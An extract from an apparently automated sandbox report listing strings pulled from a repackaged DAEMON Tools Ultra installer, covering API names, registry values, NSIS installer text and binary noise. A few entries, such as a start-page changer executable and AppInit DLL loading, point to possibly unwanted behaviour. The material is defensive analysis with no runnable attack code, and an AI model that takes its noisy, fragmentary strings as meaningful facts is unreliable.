Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

lfFdFFDD

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

lfFFFFDdDdF

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

lGm0J*34

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

library

Unicode based on Dropped File (imgengine.dll.62529018)

License.dat

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

license.dat

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

List all section names in INI file.

Ansi based on Dropped File (JSSys3.dll.204366558)

List all section names in INI file.WWW0

Ansi based on Dropped File (JSSys3.dll.204366558)

List all subkeys in a Registry key.

Ansi based on Dropped File (JSSys3.dll.204366558)

List data of all string values in a Registry key.

Ansi based on Dropped File (JSSys3.dll.204366558)

List names and sizes of ADS files attached to a file or folder.

Ansi based on Dropped File (JSSys3.dll.204366558)

List values in a Registry key.

Ansi based on Dropped File (JSSys3.dll.204366558)

List values in a Registry key.1

Ansi based on Dropped File (JSSys3.dll.204366558)

list<T> too long

Ansi based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF0000.00000002.mdmp)

ListStreams

Ansi based on Dropped File (JSSys3.dll.204366558)

ListviewAlphaSelect

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

ListviewShadow

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

ljjddbVPPPMOMKKKK-KYZZ

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

LL.6_im

Ansi based on Image Processing (screen_4.png)

llfddddFDDDDDD

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

lllllDlF@

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

LLZ-MH&9`

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

ln7xP:6R

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

LoadAppInit_DLLs

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

LoadBitmapA

Ansi based on Memory/File Scan (ChangeStartPage.exe , 00044920-00002492.00000000.45424.00407000.00000002.mdmp)

LoadBitmapW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

LoadCursorA

Ansi based on Memory/File Scan (ChangeStartPage.exe , 00044920-00002492.00000000.45424.00407000.00000002.mdmp)

LoadCursorW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

LoadImageA

Ansi based on Memory/File Scan (ChangeStartPage.exe , 00044920-00002492.00000000.45424.00407000.00000002.mdmp)

LoadImageW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

LoadLibraryA

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

LoadLibraryExA

Ansi based on Memory/File Scan (ChangeStartPage.exe , 00044920-00002492.00000000.45424.00407000.00000002.mdmp)

LoadLibraryExW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

LoadLibraryW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

LoadOrderGroup = SCSI Miniport

Ansi based on Dropped File (SET4F37.tmp)

LoadVHD

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF0000.00000002.mdmp)

LoadWithoutCOM

Unicode based on Runtime Data (DiscSoftBusService.exe )

Local

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

Local AppData

Unicode based on Runtime Data (dtinst.exe )

LocalAlloc

Ansi based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

Locale

Unicode based on Hybrid Analysis (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

LocalFree

Ansi based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

LocalizedName

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

LocalRedirectOnly

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

LocalService

Unicode based on Runtime Data (DiscSoftBusService.exe )

LOGB452.tmp

Unicode based on Runtime Data (dtinst.exe )

LoggingDisabled

Unicode based on Runtime Data (dtinst.exe )

LogLevel

Unicode based on Runtime Data (dtinst.exe )

LogMask

Unicode based on Runtime Data (dtinst.exe )

LogMaxFileSize

Unicode based on Runtime Data (dtinst.exe )

Logoff, restart or shutdown Windows.

Ansi based on Dropped File (JSSys3.dll.204366558)

LookupPrivilegeValueA

Ansi based on Memory/File Scan (ChangeStartPage.exe , 00044920-00002492.00000000.45424.00409000.00000004.mdmp)

LookupPrivilegeValueW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

LPcebbooao

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

LQeeaoo`foia

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

lstrcatA

Ansi based on Memory/File Scan (ChangeStartPage.exe , 00044920-00002492.00000000.45424.00407000.00000002.mdmp)

lstrcatW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

lstrcmpA

Ansi based on Memory/File Scan (ChangeStartPage.exe , 00044920-00002492.00000000.45424.00407000.00000002.mdmp)

lstrcmpiA

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

lstrcmpiW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

lstrcmpW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe , 00017855-00001172.00000002.24349.00407000.00000002.mdmp)

lstrcpyA

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

lstrcpynA

Ansi based on Memory/File Scan (ChangeStartPage.exe , 00044920-00002492.00000000.45424.00407000.00000002.mdmp)

lstrcpynW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

lstrcpynWk

Ansi based on Dropped File (Aero.dll.125350702)

lstrcpyW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

lstrlenA

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe , 00017855-00001172.00000002.24349.00407000.00000002.mdmp)

lstrlenW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe , 00017855-00001172.00000002.24349.00407000.00000002.mdmp)

Ltd.

Unicode based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

luA_1m*y

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

lugin

Unicode based on Dropped File (Tages.dll.423655889)

lv<gSFz;\

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

LvqeK4rUtpz

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

LWf/f.t"B

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

l}H/JGX$\?

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

M"_?{*}0

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

m"rc)!ZM6

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

M/\B:{26:-`

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

m22O@k%l]d

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

M6[+1aEm'

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

M9W\[+Y9HJ

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

M:dwpz{Hs

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

M;MMmv{U[}

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

m[h.%]\#4

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

M___J___

Ansi based on Image Processing (screen_7.png)

m`Vh;;LKh

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

MachineGuid

Unicode based on Runtime Data (dtinst.exe )

MachineID

Unicode based on Runtime Data (dtinst.exe )

MachinePreferredUILanguages

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

MachineThrottling

Unicode based on Runtime Data (dtinst.exe )

map/set<T> too long

Ansi based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF0000.00000002.mdmp)

MapDialogRect

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe , 00017855-00001172.00000002.24349.00409000.00000004.mdmp)

MapNetDriveVerbs

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

MapNetDrvBtn

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

MapViewOfFile

Ansi based on Memory/File Scan (nsCDD1.tmp , 00037985-00003668.00000000.38487.10002000.00000002.mdmp)

MapWindowPoints

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe , 00017855-00001172.00000002.24349.00409000.00000004.mdmp)

March

Ansi based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

MartaExtension

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

MaxAIAUrlCountInCert

Unicode based on Runtime Data (dtinst.exe )

MaxAIAUrlRetrievalByteCount

Unicode based on Runtime Data (dtinst.exe )

MaxAIAUrlRetrievalCertCount

Unicode based on Runtime Data (dtinst.exe )

MaxAIAUrlRetrievalCountPerChain

Unicode based on Runtime Data (dtinst.exe )

MaxArchiveCount

Unicode based on Runtime Data (dtinst.exe )

MaximizeApps

Unicode based on Runtime Data (DiscSoftBusService.exe )

MaximumAllowedAllocationSize

Unicode based on Runtime Data (DiscSoftBusService.exe )

MaxQueueCount

Unicode based on Runtime Data (dtinst.exe )

MaxRpcSize

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

MaxSxSHashCount

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

MaxUrlRetrievalByteCount

Unicode based on Runtime Data (dtinst.exe )

MediaDescription = "DAEMON Tools Ultra Virtual SCSI Bus Driver"

Ansi based on Dropped File (SET4F37.tmp)

MenuText

Unicode based on Dropped File (JSSys3.dll.204366558)

MessageBoxIndirectA

Ansi based on Memory/File Scan (ChangeStartPage.exe , 00044920-00002492.00000000.45424.00407000.00000002.mdmp)

MessageBoxIndirectW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

MessageBoxW

Ansi based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000001.42903.00DF1000.00000020.mdmp)

mgB>:a,}5

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

mgiV22mJG]

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Microsoft Sans Serif

Unicode based on Hybrid Analysis (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe , 00017855-00001172.00000002.24349.00401000.00000020.mdmp)

Microsoft Visual C++ Runtime Library

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000001.42903.00DF1000.00000020.mdmp)

MJc52gcyOE#

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

ml/presentation

Ansi based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

mLyElX/M;

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

MM/dd/yy

Ansi based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

MM[SKT9644-,3-,7

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

mmcdbI???=F

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

MMena:

Ansi based on Image Processing (screen_4.png)

MMJJ@bbgjt

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

MMMPJhdop

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

MMTS699364,,33,6

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

MMYBlW~Iap

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Mn5PJ%C)K

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

mo,Ky

Ansi based on Image Processing (screen_4.png)

ModFileInfo

Ansi based on Dropped File (JSSys3.dll.204366558)

ModFileOps

Ansi based on Dropped File (JSSys3.dll.204366558)

ModIniEdit

Ansi based on Dropped File (JSSys3.dll.204366558)

ModJSSys

Ansi based on Dropped File (JSSys3.dll.204366558)

ModPath

Ansi based on Dropped File (JSSys3.dll.204366558)

ModPrintnMB

Ansi based on Dropped File (JSSys3.dll.204366558)

ModRegJSSys

Ansi based on Dropped File (JSSys3.dll.204366558)

ModRegVals

Ansi based on Dropped File (JSSys3.dll.204366558)

Module

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF1000.00000020.mdmp)

Module_Raw

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF1000.00000020.mdmp)

ModWindows

Ansi based on Dropped File (JSSys3.dll.204366558)

MOKNKKQOPWe`bodh

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Monday

Ansi based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

mOnKY

Ansi based on Image Processing (screen_4.png)

MoveFileA

Ansi based on Memory/File Scan (ChangeStartPage.exe , 00044920-00002492.00000000.45424.00407000.00000002.mdmp)

MoveFileExA

Ansi based on Memory/File Scan (ChangeStartPage.exe , 00044920-00002492.00000000.45424.00409000.00000004.mdmp)

MoveFileExW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

MoveFileW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

MP[MKTN-67--4-6Z

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

mpanyName

Unicode based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

mpgu#EX9V

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

MPQOOP`O`e``ihhjqll

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

MQb`P```be`ajhhl

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

MS Shell Dlg

Unicode based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe , 00017855-00001172.00000002.24349.00409000.00000004.mdmp)

mscoree.dll

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000001.42903.00DF1000.00000020.mdmp)

Mscoree.dll

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF1000.00000020.mdmp)

msctls_progress32

Unicode based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

MSVBVM60.DLL

Ansi based on Dropped File (JSSys3.dll.204366558)

MulDiv

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe , 00017855-00001172.00000002.24349.00407000.00000002.mdmp)

MultiByteToWideChar

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

multithread lock error

Unicode based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

MVeOwVG_h

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

MX}|7!-f

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

My Music

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

My Pictures

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

My Video

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

MZs9;wPCh

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

M|o#bq!P:

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

n ofW>4N

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

N,U7*ZNUY

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

n-Z.[j.HV?

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

n0I`j}{-

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

n6n)XP*^D

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

N8H>5>!0

Ansi based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

N:$`//U2l

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

n="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="*" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v3.0b1</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="*" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/><supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/></application></compatibility></assembly>

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

namany_na,a6pnme8HMMaHMe,na8a8peM9AeMHnann9wnMyya3aHHa9nanya6yAn

Ansi based on Image Processing (screen_4.png)

Name of software product to which PE file belongs.

Ansi based on Dropped File (JSSys3.dll.204366558)

nanHnvcTaHo_Hn

Ansi based on Image Processing (screen_4.png)

nanKY.

Ansi based on Image Processing (screen_4.png)

nanKYr

Ansi based on Image Processing (screen_4.png)

naql`BUG

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

nb-no

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

nb{8;U;&

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Nc1z}uQh

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Nd![qF~{,

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

NdrOleExtDLL

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

NeverShow.txt

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

NeverShowExt

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

newdev.dll

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF0000.00000002.mdmp)

ngWc`Kv],|

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

nhRah+5Tw

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

NK-KKKKOOOQV`bddjq

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

NM:xAA|~38

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

NMj`EFQC6

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

nmSg!%":\&pq

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

NNKKNKKTWP\^Qe

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Nn~8Mv`K|

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

nO/zDzt}S

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

nO__O_'HM_

Ansi based on Image Processing (screen_7.png)

noaynHmSC2Q

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

nod}*]t:/

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

NoFileFolderJunction

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

NoNetCrawling

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

NoRemove

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF1000.00000020.mdmp)

Not a PE file.

Unicode based on Dropped File (JSSys3.dll.204366558)

nough space for lowio initialization

Unicode based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

November

Ansi based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

NoWorkingDirectory

Unicode based on Runtime Data (DiscSoftBusService.exe )

nP1([Pr7d

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

nPM_THO'O

Ansi based on Image Processing (screen_7.png)

npMnOXeHMe

Ansi based on Image Processing (screen_4.png)

npOrpaMMa

Ansi based on Image Processing (screen_4.png)

NQOOOOOP`P`dbfjjlq

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

nqxqxswxx

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

nreg_scsi

Unicode based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

nsCDD1.tmp

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

nsDialogs.dll

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe , 00017855-00001172.00000002.24349.00409000.00000004.mdmp)

nsE23E.tmp

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

nsExec.dll

Ansi based on Memory/File Scan (nsCDD1.tmp , 00037985-00003668.00000000.38487.10002000.00000002.mdmp)

nsF6AA.tmp

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

NSIS Error

Unicode based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

NSIS: nsControl pointer property

Unicode based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe , 00017855-00001172.00000002.24349.00409000.00000004.mdmp)

NSJLw95ko

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

nslation

Unicode based on Dropped File (imgengine.dll.62529018)

nsn9DA.tmp

Unicode based on Runtime Data (ChangeStartPage.exe )

nsnD007.tmp

Unicode based on Runtime Data (HiRu.exe )

nsrD151.tmp

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

NSyR<TO,4

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

NTDLL.DLL

Ansi based on Dropped File (JSSys3.dll.204366558)

ntdll.dll

Ansi based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF0000.00000002.mdmp)

ntime Error!Program:

Unicode based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

NtQueryInformationFile

Ansi based on Dropped File (JSSys3.dll.204366558)

NtSetInformationFile

Ansi based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF0000.00000002.mdmp)

NullsoftInst

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

NV8B`QIlU

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Nw6+xLd)

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

nwBPh^CQD

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

nx]>aM

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

NYwA,SJ2T

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

N~5GEbcj"

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

O 5m?gXN:

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

o initialization

Unicode based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

O,KmP!eQ}&

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

O-"(>(x%@~W

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

o.DVI<qZH

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

o=|/,wN)'[

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

O_3ap...

Ansi based on Image Processing (screen_4.png)

oader@@

Ansi based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

oB@D0O@|{

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

OC,aFl#6;c

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

oc6=#)

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

ocalServer32

Unicode based on Dropped File (JSSys3.dll.204366558)

oCdPaiLVs

Ansi based on Dropped File (Aero.dll.125350702)

October

Unicode based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

odo^PQ\PO\s]_sss

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

oductName

Unicode based on Dropped File (JSSys3.dll.204366558)

Oek4V7G.

